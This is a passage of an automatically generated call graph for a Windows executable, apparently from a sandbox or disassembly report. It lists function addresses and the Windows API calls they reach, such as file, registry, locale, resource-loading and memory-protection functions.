6053->6054 6055 403a5a WriteFile 6053->6055 6055->6054 6056 403a78 GetLastError 6055->6056 6056->6054 6255 4028d2 6256 4028da 6255->6256 6257 403554 4 API calls 6256->6257 6258 4028ef 6256->6258 6257->6256 6259 4025ac 4 API calls 6258->6259 6260 4028f4 6259->6260 6616 4019d3 6617 4019ba 6616->6617 6618 4019c3 RtlLeaveCriticalSection 6617->6618 6619 4019cd 6617->6619 6618->6619 6057 402654 6058 403154 4 API calls 6057->6058 6059 402614 6058->6059 6060 402632 6059->6060 6061 403154 4 API calls 6059->6061 6060->6060 6061->6060 6062 409e55 6071 409238 6062->6071 6065 402f24 5 API calls 6066 409e72 6065->6066 6067 403198 4 API calls 6066->6067 6068 409e91 6067->6068 6069 403198 4 API calls 6068->6069 6070 409e99 6069->6070 6080 4055f4 6071->6080 6073 409281 6076 403198 4 API calls 6073->6076 6074 409253 6074->6073 6086 406fdc 6074->6086 6078 409296 6076->6078 6077 409271 6079 409279 MessageBoxA 6077->6079 6078->6065 6079->6073 6081 403154 4 API calls 6080->6081 6082 4055f9 6081->6082 6083 405611 6082->6083 6084 403154 4 API calls 6082->6084 6083->6074 6085 405607 6084->6085 6085->6074 6087 4055f4 4 API calls 6086->6087 6088 406feb 6087->6088 6089 406ff1 6088->6089 6090 406fff 6088->6090 6091 40322c 4 API calls 6089->6091 6092 40700f 6090->6092 6095 40701b 6090->6095 6094 406ffd 6091->6094 6097 406fa0 6092->6097 6094->6077 6104 4032b8 6095->6104 6098 40322c 4 API calls 6097->6098 6099 406faf 6098->6099 6100 406fcc 6099->6100 6101 406734 CharPrevA 6099->6101 6100->6094 6102 406fbb 6101->6102 6102->6100 6103 4032fc 4 API calls 6102->6103 6103->6100 6105 403278 4 API calls 6104->6105 6106 4032c2 6105->6106 6106->6094 6107 40885a 6108 408863 6107->6108 6109 403198 4 API calls 6108->6109 6113 4088fd 6109->6113 6110 4031b8 4 API calls 6112 4089ad 6110->6112 6111 408914 6115 4032fc 4 API calls 6111->6115 6113->6111 6114 403278 4 API calls 6113->6114 6116 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6113->6116 6117 408928 6113->6117 6114->6113 6115->6117 6116->6113 6117->6110 6627 409bdf 6628 409650 4 API calls 6627->6628 6629 409be4 6628->6629 6630 409be9 6629->6630 6631 402f24 5 API calls 6629->6631 6632 40764c InterlockedExchange 6630->6632 6631->6630 6633 409c11 6632->6633 6634 409c21 6633->6634 6635 409650 4 API calls 6633->6635 6636 407388 23 API calls 6634->6636 6635->6634 6637 409c33 6636->6637 6638 4073e0 22 API calls 6637->6638 6639 409c3d 6638->6639 6640 407388 23 API calls 6639->6640 6641 409c49 6640->6641 6642 4073fc 22 API calls 6641->6642 6643 409c5d 6642->6643 6644 4025ac 4 API calls 6643->6644 6645 409c74 6644->6645 4967 4073e0 SetEndOfFile 4968 4073f0 4967->4968 4969 4073f7 4967->4969 4971 40730c GetLastError 4968->4971 4974 40726c 4971->4974 4983 407054 FormatMessageA 4974->4983 4977 4072b4 4990 4057d8 4977->4990 4980 4072c3 4994 403198 4980->4994 4984 40707a 4983->4984 4998 403278 4984->4998 4987 4050dc 5025 4050f0 4987->5025 4991 4057df 4990->4991 4992 4031e8 4 API calls 4991->4992 4993 4057f7 4992->4993 4993->4980 4995 4031b7 4994->4995 4996 40319e 4994->4996 4995->4969 4996->4995 5153 4025ac 4996->5153 5003 403254 4998->5003 5000 403288 5001 403198 4 API calls 5000->5001 5002 4032a0 5001->5002 5002->4977 5002->4987 5004 403274 5003->5004 5005 403258 5003->5005 5004->5000 5008 402594 5005->5008 5007 403261 5007->5000 5009 4025a2 5008->5009 5010 402598 5008->5010 5009->5007 5009->5009 5010->5009 5012 403154 5010->5012 5013 403164 5012->5013 5014 40318c TlsGetValue 5012->5014 5013->5009 5015 403196 5014->5015 5016 40316f 5014->5016 5015->5009 5020 40310c 5016->5020 5018 403174 TlsGetValue 5019 403184 5018->5019 5019->5009 5021 403120 LocalAlloc 5020->5021 5022 403116 5020->5022 5023 40313e TlsSetValue 5021->5023 5024 403132 5021->5024 5022->5021 5023->5024 5024->5018 5026 40510d 5025->5026 5033 404da0 5026->5033 5029 405139 5031 403278 4 API calls 5029->5031 5032 4050eb 5031->5032 5032->4977 5036 404dbb 5033->5036 5034 404dcd 5034->5029 5038 404b2c 5034->5038 5036->5034 5041 404ec2 5036->5041 5048 404d94 5036->5048 5145 405888 5038->5145 5040 404b3d 5040->5029 5042 404ed3 5041->5042 5044 404f21 5041->5044 5042->5044 5045 404fa7 5042->5045 5047 404f3f 5044->5047 5051 404d3c 5044->5051 5045->5047 5055 404d80 5045->5055 5047->5036 5049 403198 4 API calls 5048->5049 5050 404d9e 5049->5050 5050->5036 5052 404d4a 5051->5052 5058 404b44 5052->5058 5054 404d78 5054->5044 5084 4039a4 5055->5084 5061 4058f8 5058->5061 5060 404b5d 5060->5054 5062 405906 5061->5062 5071 404c24 LoadStringA 5062->5071 5065 4050dc 19 API calls 5066 40593e 5065->5066 5074 4031e8 5066->5074 5072 403278 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5071->5072 5073 404c51 5072->5073 5073->5065 5075 4031ec 5074->5075 5078 4031fc 5074->5078 5077 403254 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5075->5077 5075->5078 5076 403228 5080 4031b8 5076->5080 5077->5078 5078->5076 5079 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5078->5079 5079->5076 5081 4031be 5080->5081 5082 4031e3 5081->5082 5083 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5081->5083 5082->5060 5083->5081 5085 4039ab 5084->5085 5090 4038b4 5085->5090 5087 4039cb 5088 403198 4 API calls 5087->5088 5089 4039d2 5088->5089 5089->5047 5091 4038d5 5090->5091 5092 4038c8 5090->5092 5094 403934 5091->5094 5095 4038db 5091->5095 5118 403780 5092->5118 5096 403993 5094->5096 5097 40393b 5094->5097 5098 4038e1 5095->5098 5099 4038ee 5095->5099 5102 4037f4 3 API calls 5096->5102 5103 403941 5097->5103 5104 40394b 5097->5104 5125 403894 5098->5125 5101 403894 6 API calls 5099->5101 5107 4038fc 5101->5107 5105 4038d0 5102->5105 5140 403864 5103->5140 5106 4037f4 3 API calls 5104->5106 5105->5087 5109 40395d 5106->5109 5130 4037f4 5107->5130 5111 403864 9 API calls 5109->5111 5113 403976 5111->5113 5112 403917 5136 40374c 5112->5136 5115 40374c VariantClear 5113->5115 5117 40398b 5115->5117 5116 40392c 5116->5087 5117->5087 5119 4037f0 5118->5119 5120 403744 5118->5120 5119->5105 5120->5118 5121 403793 VariantClear 5120->5121 5122 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5120->5122 5123 4037dc VariantCopyInd 5120->5123 5124 4037ab 5120->5124 5121->5120 5122->5120 5123->5119 5123->5120 5124->5105 5126 4036b8 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5125->5126 5127 4038a0 5126->5127 5128 40374c VariantClear 5127->5128 5129 4038a9 5128->5129 5129->5105 5131 403845 VariantChangeTypeEx 5130->5131 5132 40380a VariantChangeTypeEx 5130->5132 5135 403832 5131->5135 5133 403826 5132->5133 5134 40374c VariantClear 5133->5134 5134->5135 5135->5112 5137 403759 5136->5137 5138 403766 5136->5138 5137->5138 5139 403779 VariantClear 5137->5139 5138->5116 5139->5116 5141 40369c 8 API calls 5140->5141 5142 40387b 5141->5142 5143 40374c VariantClear 5142->5143 5144 403882 5143->5144 5144->5105 5146 405894 5145->5146 5147 404c24 5 API calls 5146->5147 5148 4058ba 5147->5148 5149 4031e8 4 API calls 5148->5149 5150 4058c5 5149->5150 5151 403198 4 API calls 5150->5151 5152 4058da 5151->5152 5152->5040 5154 4025b0 5153->5154 5155 4025ba 5153->5155 5154->5155 5156 403154 4 API calls 5154->5156 5155->4995 5155->5155 5156->5155 6118 402e64 6119 402e69 6118->6119 6120 402e7a RtlUnwind 6119->6120 6121 402e5e 6119->6121 6122 402e9d 6120->6122 5587 406de7 5588 406dd8 SetErrorMode 5587->5588 5727 4099e9 5728 409a0e 5727->5728 5762 4093c8 5728->5762 5730 409aa0 5781 4026c4 GetSystemTime 5730->5781 5731 409a13 5734 409a4d 5731->5734 5819 4089fc 5731->5819 5733 409aa5 5782 408f50 5733->5782 5734->5730 5739 4089fc 4 API calls 5734->5739 5737 409a38 5740 409a40 MessageBoxA 5737->5740 5742 409a7c 5739->5742 5822 4057ac 5740->5822 5741 4031e8 4 API calls 5744 409aba 5741->5744 5746 409a84 MessageBoxA 5742->5746 5800 408e44 5744->5800 5746->5730 5748 409a91 5746->5748 5750 4057ac 5 API calls 5748->5750 5749 4031e8 4 API calls 5751 409add 5749->5751 5750->5730 5752 407388 23 API calls 5751->5752 5753 409aef 5752->5753 5754 407120 23 API calls 5753->5754 5755 409b1c 5754->5755 5756 402594 4 API calls 5755->5756 5757 409b3c 5756->5757 5758 4076e8 28 API calls 5757->5758 5759 409b7e 5758->5759 5760 407978 26 API calls 5759->5760 5761 409ba5 5760->5761 5763 4093d9 5762->5763 5764 40940f 5762->5764 5763->5764 5774 4093ff 5763->5774 5765 409418 5764->5765 5766 40941c 5764->5766 5768 409423 GetUserDefaultLangID 5765->5768 5770 40941a 5765->5770 5832 406df4 GetModuleHandleA GetProcAddress 5766->5832 5768->5770 5771 409498 5770->5771 5773 40945e 5770->5773 5777 409451 5770->5777 5772 40937c 5 API calls 5771->5772 5775 409406 5772->5775 5773->5771 5779 40948b 5773->5779 5826 40937c 5774->5826 5775->5731 5778 40937c 5 API calls 5777->5778 5778->5775 5780 40937c 5 API calls 5779->5780 5780->5775 5781->5733 5785 408f70 5782->5785 5784 408e44 12 API calls 5784->5785 5785->5784 5786 408f95 CreateDirectoryA 5785->5786 5790 4089fc 4 API calls 5785->5790 5793 404bdc 19 API calls 5785->5793 5796 407054 5 API calls 5785->5796 5798 4089cc 4 API calls 5785->5798 5799 4057d8 4 API calls 5785->5799 5892 406adc 5785->5892 5787 40900d 5786->5787 5788 408f9f GetLastError 5786->5788 5789 40322c 4 API calls 5787->5789 5788->5785 5791 409017 5789->5791 5790->5785 5792 4031b8 4 API calls 5791->5792 5794 409031 5792->5794 5793->5785 5795 4031b8 4 API calls 5794->5795 5797 40903e 5795->5797 5796->5785 5797->5741 5798->5785 5799->5785 5801 408e64 5800->5801 5802 40658c 5 API calls 5801->5802 5803 408e7d 5802->5803 5804 40322c 4 API calls 5803->5804 5811 408e88 5804->5811 5806 406754 6 API calls 5806->5811 5807 4033b4 4 API calls 5807->5811 5808 4089fc 4 API calls 5808->5811 5810 4057d8 4 API calls 5810->5811 5811->5806 5811->5807 5811->5808 5811->5810 5812 408f04 5811->5812 6003 408dd0 5811->6003 6011 408c54 5811->6011 5813 40322c 4 API calls 5812->5813 5814 408f0f 5813->5814 5815 4031b8 4 API calls 5814->5815 5816 408f29 5815->5816 5817 403198 4 API calls 5816->5817 5818 408f31 5817->5818 5818->5749 5820 4089cc 4 API calls 5819->5820 5821 408a18 5820->5821 5821->5737 5823 4057b1 5822->5823 5824 405888 5 API calls 5823->5824 5825 4057c3 5824->5825 5825->5825 5827 409384 5826->5827 5831 4093bc 5826->5831 5828 403420 4 API calls 5827->5828 5827->5831 5829 4093b6 5828->5829 5853 408aa4 5829->5853 5831->5775 5833 406e37 5832->5833 5834 406e2e 5832->5834 5835 406e40 5833->5835 5836 406e78 5833->5836 5844 403198 4 API calls 5834->5844 5869 406d38 5835->5869 5838 406d38 RegOpenKeyExA 5836->5838 5840 406e91 5838->5840 5839 406e59 5841 406eae 5839->5841 5872 406d2c 5839->5872 5840->5841 5845 406d2c 6 API calls 5840->5845 5842 40322c 4 API calls 5841->5842 5846 406ebb 5842->5846 5848 406ef0 5844->5848 5849 406ea5 RegCloseKey 5845->5849 5850 4032fc 4 API calls 5846->5850 5851 403198 4 API calls 5848->5851 5849->5841 5850->5834 5852 406ef8 5851->5852 5852->5770 5854 408ab2 5853->5854 5856 408aca 5854->5856 5866 408a3c 5854->5866 5857 408a3c 4 API calls 5856->5857 5858 408aee 5856->5858 5857->5858 5859 40764c InterlockedExchange 5858->5859 5860 408b07 5859->5860 5861 408a3c 4 API calls 5860->5861 5863 408b1a 5860->5863 5861->5863 5862 408a3c 4 API calls 5862->5863 5863->5862 5864 403278 4 API calls 5863->5864 5865 408b49 5863->5865 5864->5863 5865->5831 5867 4057d8 4 API calls 5866->5867 5868 408a4d 5867->5868 5868->5856 5870 406d43 5869->5870 5871 406d49 RegOpenKeyExA 5869->5871 5870->5871 5871->5839 5875 406bf8 5872->5875 5876 406c1d RegQueryValueExA 5875->5876 5877 406c5f 5876->5877 5883 406c3d 5876->5883 5879 403198 4 API calls 5877->5879 5878 406c57 5880 403198 4 API calls 5878->5880 5882 406d18 RegCloseKey 5879->5882 5880->5877 5881 403278 4 API calls 5881->5883 5882->5841 5883->5877 5883->5878 5883->5881 5884 403420 4 API calls 5883->5884 5885 406c7f RegQueryValueExA 5884->5885 5885->5876 5886 406c94 5885->5886 5886->5877 5887 4034f0 4 API calls 5886->5887 5888 406cda 5887->5888 5889 406cee 5888->5889 5891 403420 4 API calls 5888->5891 5890 4031e8 4 API calls 5889->5890 5890->5877 5891->5889 5915 406834 5892->5915 5895 406b0e 5896 406834 5 API calls 5895->5896 5899 406b5a 5895->5899 5898 406b1e 5896->5898 5900 406b2a 5898->5900 5902 406810 7 API calls 5898->5902 5923 4066d8 5899->5923 5900->5899 5903 406b4f 5900->5903 5905 406834 5 API calls 5900->5905 5902->5900 5903->5899 5945 406ab0 GetWindowsDirectoryA 5903->5945 5908 406b43 5905->5908 5908->5903 5911 406810 7 API calls 5908->5911 5909 406b6f 5910 40322c 4 API calls 5909->5910 5912 406b79 5910->5912 5911->5903 5913 4031b8 4 API calls 5912->5913 5914 406b93 5913->5914 5914->5785 5916 4034f0 4 API calls 5915->5916 5917 406847 5916->5917 5918 40685e GetEnvironmentVariableA 5917->5918 5922 406871 5917->5922 5947 406bd4 5917->5947 5918->5917 5919 40686a 5918->5919 5920 403198 4 API calls 5919->5920 5920->5922 5922->5895 5942 406810 5922->5942 5924 403414 5923->5924 5925 4066fb GetFullPathNameA 5924->5925 5926 406707 5925->5926 5927 40671e 5925->5927 5926->5927 5928 40670f 5926->5928 5929 40322c 4 API calls 5927->5929 5930 403278 4 API calls 5928->5930 5931 40671c 5929->5931 5930->5931 5932 40658c 5931->5932 5933 406596 5932->5933 5934 4065b8 5932->5934 5951 406734 5933->5951 5936 40322c 4 API calls 5934->5936 5938 4065c1 5936->5938 5937 40659d 5937->5934 5939 4065a7 5937->5939 5938->5909 5955 403340 5939->5955 5941 4065b5 5941->5909 5970 4067b8 5942->5970 5946 406ad1 5945->5946 5946->5899 5948 406be2 5947->5948 5949 4034f0 4 API calls 5948->5949 5950 406bf0 5949->5950 5950->5917 5952 40673b 5951->5952 5953 40673f 5951->5953 5952->5937 5954 406746 CharPrevA 5953->5954 5954->5937 5956 403344 5955->5956 5957 4033a5 5955->5957 5958 4031e8 5956->5958 5959 40334c 5956->5959 5964 403254 4 API calls 5958->5964 5965 4031fc 5958->5965 5959->5957 5961 40335b 5959->5961 5962 4031e8 4 API calls 5959->5962 5960 403228 5960->5941 5963 403254 4 API calls 5961->5963 5962->5961 5967 403375 5963->5967 5964->5965 5965->5960 5966 4025ac 4 API calls 5965->5966 5966->5960 5968 4031e8 4 API calls 5967->5968 5969 4033a1 5968->5969 5969->5941 5977 406754 5970->5977 5972 4067da 5973 4067e2 GetFileAttributesA 5972->5973 5974 4067f7 5973->5974 5975 403198 4 API calls 5974->5975 5976 4067ff 5975->5976 5976->5895 5987 406600 5977->5987 5979 406765 5980 406777 CharPrevA 5979->5980 5981 40678b 5979->5981 5980->5979 5982 4067a1 5981->5982 5983 406796 5981->5983 5994 403454 5982->5994 5984 40322c 4 API calls 5983->5984 5986 40679f 5984->5986 5986->5972 5989 406611 5987->5989 5988 406671 5990 40666c 5988->5990 5991 4065d0 IsDBCSLeadByte 5988->5991 5989->5988 5993 40662d 5989->5993 5990->5979 5991->5990 5993->5990 6001 4065d0 IsDBCSLeadByte 5993->6001 5995 403486 5994->5995 5996 403459 5994->5996 5997 403198 4 API calls 5995->5997 5996->5995 5998 40346d 5996->5998 6000 40347c 5997->6000 5999 403278 4 API calls 5998->5999 5999->6000 6000->5986 6002 4065e4 6001->6002 6002->5993 6004 403198 4 API calls 6003->6004 6006 408df1 6004->6006 6008 408e1e 6006->6008 6020 4032a8 6006->6020 6023 403494 6006->6023 6009 403198 4 API calls 6008->6009 6010 408e33 6009->6010 6010->5811 6012 408b90 2 API calls 6011->6012 6013 408c6a 6012->6013 6014 408c6e 6013->6014 6027 406824 6013->6027 6014->5811 6017 408ca1 6018 408bcc Wow64RevertWow64FsRedirection 6017->6018 6019 408ca9 6018->6019 6019->5811 6021 403278 4 API calls 6020->6021 6022 4032b5 6021->6022 6022->6006 6024 4034c3 6023->6024 6025 403498 6023->6025 6024->6006 6026 4034f0 4 API calls 6025->6026 6026->6024 6028 4067b8 7 API calls 6027->6028 6029 40682e GetLastError 6028->6029 6029->6017 6646 402be9 RaiseException 6647 402c04 6646->6647 6269 405aea 6270 405aec 6269->6270 6271 405b28 6270->6271 6273 405b22 6270->6273 6274 405b3f 6270->6274 6272 405888 5 API calls 6271->6272 6278 405b3b 6272->6278 6273->6271 6275 405b94 6273->6275 6277 404c24 5 API calls 6274->6277 6276 4058f8 19 API calls 6275->6276 6276->6278 6280 405b68 6277->6280 6279 403198 4 API calls 6278->6279 6281 405bce 6279->6281 6282 4058f8 19 API calls 6280->6282 6282->6278 5157 4097f0 5202 4030dc 5157->5202 5159 409806 5205 4042e8 5159->5205 5161 40980b 5208 406510 5161->5208 5165 409815 5218 408cc4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5165->5218 5174 4031e8 4 API calls 5175 409861 5174->5175 5251 407120 5175->5251 5180 4098db 5183 4098ee 5180->5183 5316 409650 5180->5316 5271 407388 5183->5271 5190 40723c 23 API calls 5190->5180 5191 409914 5192 40992f 5191->5192 5194 409650 4 API calls 5191->5194 5279 4076e8 5192->5279 5194->5192 5195 409954 5297 4087ac 5195->5297 5199 409994 5200 4087ac 26 API calls 5199->5200 5201 4099ca 5199->5201 5200->5199 5326 403094 5202->5326 5204 4030e1 GetModuleHandleA GetCommandLineA 5204->5159 5206 404323 5205->5206 5207 403154 4 API calls 5205->5207 5206->5161 5207->5206 5327 405bf0 5208->5327 5217 40655c 6F551CD0 5217->5165 5219 408d17 5218->5219 5417 406d70 SetErrorMode 5219->5417 5222 407054 5 API calls 5223 408d47 5222->5223 5224 403198 4 API calls 5223->5224 5225 408d5c 5224->5225 5226 4096e0 GetSystemInfo VirtualQuery 5225->5226 5227 409794 5226->5227 5230 40970a 5226->5230 5232 4092a4 5227->5232 5228 409775 VirtualQuery 5228->5227 5228->5230 5229 409734 VirtualProtect 5229->5230 5230->5227 5230->5228 5230->5229 5231 409763 VirtualProtect 5230->5231 5231->5228 5423 4069a8 5232->5423 5234 409332 5235 4031b8 4 API calls 5234->5235 5237 40934c 5235->5237 5236 406a14 6 API calls 5239 4092c1 5236->5239 5240 406a14 5237->5240 5238 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5238->5239 5239->5234 5239->5236 5239->5238 5241 406a3b GetModuleFileNameA 5240->5241 5242 406a5f 5240->5242 5243 403278 4 API calls 5241->5243 5244 406884 GetCommandLineA 5242->5244 5245 406a5d 5243->5245 5248 406a67 5244->5248 5246 406a89 5245->5246 5247 403198 4 API calls 5246->5247 5249 406a9e 5247->5249 5248->5246 5250 40690c 4 API calls 5248->5250 5249->5174 5250->5248 5252 40712a 5251->5252 5446 4071b6 5252->5446 5449 4071b8 5252->5449 5253 407155 5254 407169 5253->5254 5255 40730c 21 API calls 5253->5255 5258 40979c FindResourceA 5254->5258 5255->5254 5259 4097b1 5258->5259 5260 4097b6 SizeofResource 5258->5260 5261 409650 4 API calls 5259->5261 5262 4097c3 5260->5262 5263 4097c8 LoadResource 5260->5263 5261->5260 5264 409650 4 API calls 5262->5264 5265 4097d6 5263->5265 5266 4097db LockResource 5263->5266 5264->5263 5267 409650 4 API calls 5265->5267 5268 4097e7 5266->5268 5269 4097ec 5266->5269 5267->5266 5270 409650 4 API calls 5268->5270 5269->5180 5308 40764c 5269->5308 5270->5269 5452 4073a0 SetFilePointer 5271->5452 5274 407360 5457 407320 ReadFile 5274->5457 5277 407384 5277->5191 5278 40726c 20 API calls 5278->5277 5280 4076f5 5279->5280 5281 407320 23 API calls 5280->5281 5282 40771e 5281->5282 5283 407732 5282->5283 5284 407320 23 API calls 5282->5284 5285 4057d8 4 API calls 5283->5285 5286 407748 5283->5286 5284->5283 5285->5286 5287 40764c InterlockedExchange 5286->5287 5288 40775a 5287->5288 5289 407770 5288->5289 5290 4057d8 4 API calls 5288->5290 5463 407204 SetFilePointer 5289->5463 5290->5289 5292 40777f 5293 40723c 23 API calls 5292->5293 5294 407794 5293->5294 5295 4077b4 5294->5295 5296 4057d8 4 API calls 5294->5296 5295->5195 5296->5295 5298 408820 5297->5298 5301 4087da 5297->5301 5468 407978 5298->5468 5300 408834 5303 403198 4 API calls 5300->5303 5301->5298 5302 403278 4 API calls 5301->5302 5305 403420 4 API calls 5301->5305 5306 4031e8 4 API calls 5301->5306 5307 407978 26 API calls 5301->5307 5302->5301 5304 408849 5303->5304 5323 404b68 5304->5323 5305->5301 5306->5301 5307->5301 5580 4075f8 5308->5580 5311 40723c GetFileSize 5312 407266 5311->5312 5313 407256 GetLastError 5311->5313 5312->5183 5312->5190 5313->5312 5314 40725f 5313->5314 5315 40730c 21 API calls 5314->5315 5315->5312 5317 409671 5316->5317 5318 409659 5316->5318 5320 4057d8 4 API calls 5317->5320 5319 4057d8 4 API calls 5318->5319 5321 40966b 5319->5321 5322 409682 5320->5322 5321->5183 5322->5183 5324 402594 4 API calls 5323->5324 5325 404b73 5324->5325 5325->5199 5326->5204 5328 405888 5 API calls 5327->5328 5329 405c01 5328->5329 5330 4051c8 GetSystemDefaultLCID 5329->5330 5333 4051fe 5330->5333 5331 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5331->5333 5332 404c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5332->5333 5333->5331 5333->5332 5334 405154 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5333->5334 5335 405260 5333->5335 5334->5333 5336 404c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5335->5336 5337 405154 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5335->5337 5338 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5335->5338 5339 4052e3 5335->5339 5336->5335 5337->5335 5338->5335 5340 4031b8 4 API calls 5339->5340 5341 4052fd 5340->5341 5342 40530c GetSystemDefaultLCID 5341->5342 5399 405154 GetLocaleInfoA 5342->5399 5345 4031e8 4 API calls 5346 40534c 5345->5346 5347 405154 5 API calls 5346->5347 5348 405361 5347->5348 5349 405154 5 API calls 5348->5349 5350 405385 5349->5350 5405 4051a0 GetLocaleInfoA 5350->5405 5353 4051a0 GetLocaleInfoA 5354 4053b5 5353->5354 5355 405154 5 API calls 5354->5355 5356 4053cf 5355->5356 5357 4051a0 GetLocaleInfoA 5356->5357 5358 4053ec 5357->5358 5359 405154 5 API calls 5358->5359 5360 405406 5359->5360 5361 4031e8 4 API calls 5360->5361 5362 405413 5361->5362 5363 405154 5 API calls 5362->5363 5364 405428 5363->5364 5365 4031e8 4 API calls 5364->5365 5366 405435 5365->5366 5367 4051a0 GetLocaleInfoA 5366->5367 5368 405443 5367->5368 5369 405154 5 API calls 5368->5369 5370 40545d 5369->5370 5371 4031e8 4 API calls 5370->5371 5372 40546a 5371->5372 5373 405154 5 API calls 5372->5373 5374 40547f 5373->5374 5375 4031e8 4 API calls 5374->5375 5376 40548c 5375->5376 5377 405154 5 API calls 5376->5377 5378 4054a1 5377->5378 5379 4054be 5378->5379 5380 4054af 5378->5380 5382 40322c 4 API calls 5379->5382 5413 40322c 5380->5413 5383 4054bc 5382->5383 5384 405154 5 API calls 5383->5384 5385 4054e0 5384->5385 5386 4054fd 5385->5386 5387 4054ee 5385->5387 5389 403198 4 API calls 5386->5389 5388 40322c 4 API calls 5387->5388 5390 4054fb 5388->5390 5389->5390 5407 4033b4 5390->5407 5392 40551f 5393 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5392->5393 5394 405539 5393->5394 5395 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5394->5395 5396 405553 5395->5396 5397 405c3c GetVersionExA 5396->5397 5398 405c53 5397->5398 5398->5217 5400 40517b 5399->5400 5401 40518d 5399->5401 5402 403278 4 API calls 5400->5402 5403 40322c 4 API calls 5401->5403 5404 40518b 5402->5404 5403->5404 5404->5345 5406 4051bc 5405->5406 5406->5353 5408 4033bc 5407->5408 5409 403254 4 API calls 5408->5409 5410 4033cf 5409->5410 5411 4031e8 4 API calls 5410->5411 5412 4033f7 5411->5412 5415 403230 5413->5415 5414 403252 5414->5383 5415->5414 5416 4025ac 4 API calls 5415->5416 5416->5414 5421 403414 5417->5421 5420 406dbe 5420->5222 5422 403418 LoadLibraryA 5421->5422 5422->5420 5430 406884 GetCommandLineA 5423->5430 5425 4069c8 5427 4069e9 5425->5427 5432 40690c 5425->5432 5428 4031b8 4 API calls 5427->5428 5429 406a03 5428->5429 5429->5239 5431 406891 5430->5431 5431->5425 5433 40692e 5432->5433 5434 403278 4 API calls 5433->5434 5435 406962 5434->5435 5442 403420 5435->5442 5437 40696a 5438 4031e8 4 API calls 5437->5438 5439 406982 5438->5439 5440 403198 4 API calls 5439->5440 5441 406997 5440->5441 5441->5425 5443 403426 5442->5443 5445 403437 5442->5445 5444 403254 4 API calls 5443->5444 5443->5445 5444->5445 5445->5437 5447 4071b8 5446->5447 5448 4071f7 CreateFileA 5447->5448 5448->5253 5450 403414 5449->5450 5451 4071f7 CreateFileA 5450->5451 5451->5253 5453 40739b 5452->5453 5454 4073c7 GetLastError 5452->5454 5453->5274 5454->5453 5455 4073d0 5454->5455 5456 40730c 21 API calls 5455->5456 5456->5453 5458 407340 5457->5458 5459 407357 5457->5459 5460 407350 5458->5460 5461 407346 GetLastError 5458->5461 5459->5277 5459->5278 5462 40730c 21 API calls 5460->5462 5461->5459 5461->5460 5462->5459 5464 407237 5463->5464 5465 407227 GetLastError 5463->5465 5464->5292 5465->5464 5466 407230 5465->5466 5467 40730c 21 API calls 5466->5467 5467->5464 5469 407993 5468->5469 5470 407988 5468->5470 5491 40791c 5469->5491 5476 407d5c 5470->5476 5472 407991 5472->5300 5474 4057d8 4 API calls 5474->5472 5477 407d84 5476->5477 5479 407d8b 5476->5479 5495 407b9c 5477->5495 5480 407db2 5479->5480 5482 407da6 5479->5482 5483 407da8 5479->5483 5481 407de7 5480->5481 5484 407ab0 19 API calls 5480->5484 5486 403198 4 API calls 5481->5486 5487 4050dc 19 API calls 5482->5487 5517 407ab0 5483->5517 5484->5481 5489 407dfc 5486->5489 5488 407dce 5487->5488 5520 407a38 5488->5520 5489->5472 5492 40796f 5491->5492 5493 407930 5491->5493 5492->5472 5492->5474 5493->5492 5568 40786c 5493->5568 5496 407bc8 5495->5496 5497 407bd5 5496->5497 5498 407ab0 19 API calls 5496->5498 5499 407bf2 5497->5499 5500 407ab0 19 API calls 5497->5500 5498->5497 5501 407c0b 5499->5501 5502 407ab0 19 API calls 5499->5502 5500->5499 5503 407ab0 19 API calls 5501->5503 5504 407c1b 5501->5504 5502->5501 5503->5504 5507 407c98 5504->5507 5530 407b40 5504->5530 5508 407cea 5507->5508 5509 407ce0 5507->5509 5510 407cde 5507->5510 5512 403198 4 API calls 5508->5512 5511 407ab0 19 API calls 5509->5511 5514 4050dc 19 API calls 5510->5514 5511->5508 5513 407d29 5512->5513 5513->5479 5515 407d06 5514->5515 5516 407a38 4 API calls 5515->5516 5516->5508 5533 40580c 5517->5533 5519 407ad2 5519->5480 5521 407a3b 5520->5521 5522 40322c 4 API calls 5521->5522 5523 407a5d 5522->5523 5541 4032fc 5523->5541 5525 407a67 5526 4057d8 4 API calls 5525->5526 5527 407a76 5526->5527 5528 403198 4 API calls 5527->5528 5529 407a90 5528->5529 5529->5480 5531 407b54 VirtualFree 5530->5531 5532 407b66 VirtualAlloc 5530->5532 5531->5532 5532->5507 5534 405818 5533->5534 5535 4050dc 19 API calls 5534->5535 5536 405845 5535->5536 5537 4031e8 4 API calls 5536->5537 5538 405850 5537->5538 5539 403198 4 API calls 5538->5539 5540 405865 5539->5540 5540->5519 5542 403300 5541->5542 5543 40333f 5541->5543 5544 4031e8 5542->5544 5545 40330a 5542->5545 5543->5525 5548 4031fc 5544->5548 5552 403254 4 API calls 5544->5552 5546 403334 5545->5546 5547 40331d 5545->5547 5551 4034f0 4 API calls 5546->5551 5555 4034f0 5547->5555 5550 403228 5548->5550 5554 4025ac 4 API calls 5548->5554 5550->5525 5553 403322 5551->5553 5552->5548 5553->5525 5554->5550 5556 4034fd 5555->5556 5563 40352d 5555->5563 5557 403526 5556->5557 5559 403509 5556->5559 5560 403254 4 API calls 5557->5560 5558 403198 4 API calls 5561 403517 5558->5561 5564 4025c4 5559->5564 5560->5563 5561->5553 5563->5558 5565 4025ca 5564->5565 5566 4025dc 5565->5566 5567 403154 4 API calls 5565->5567 5566->5561 5566->5566 5567->5566 5569 407877 5568->5569 5570 407888 5568->5570 5572 4057d8 4 API calls 5569->5572 5571 407360 23 API 